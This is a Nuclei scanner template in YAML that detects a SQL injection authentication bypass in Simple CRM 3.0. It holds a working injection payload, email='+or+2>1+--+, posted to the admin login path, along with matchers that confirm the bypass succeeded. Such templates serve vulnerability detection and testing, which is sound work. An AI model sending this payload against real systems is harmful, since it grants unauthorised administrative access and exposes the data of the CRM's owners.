nuclei-templates/http/vulnerabilities/simplecrm/simple-crm-sql-injection.yaml

42 lines
1.1 KiB
YAML

id: simple-crm-sql-injection
info:
name: Simple CRM 3.0 SQL Injection and Authentication Bypass
author: geeknik
severity: critical
description: Simple CRM 3.0 is susceptible to SQL injection and authentication bypass vulnerabilities.
reference:
- https://packetstormsecurity.com/files/163254/simplecrm30-sql.txt
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
cvss-score: 10
cwe-id: CWE-89
metadata:
max-request: 1
tags: packetstorm,sqli,simplecrm,auth-bypass,injection
http:
- method: POST
path:
- "{{BaseURL}}/scrm/crm/admin"
body: "email='+or+2>1+--+&password=&login="
matchers-condition: and
matchers:
- type: status
status:
- 200
- type: word
words:
- "<script>window.location.href='home.php'</script>"
part: body
- type: word
words:
- "text/html"
part: header
# digest: 4a0a00473045022100fb935a31f252cd271cabf6d114d393032aaaa3329b659f8642614c088c89b8a6022059b082290c0cf389db6cb3de3ef354fc1a554bd6336db8109f74f2b76197ccec:922c64590222798bb761d5b6d8e72950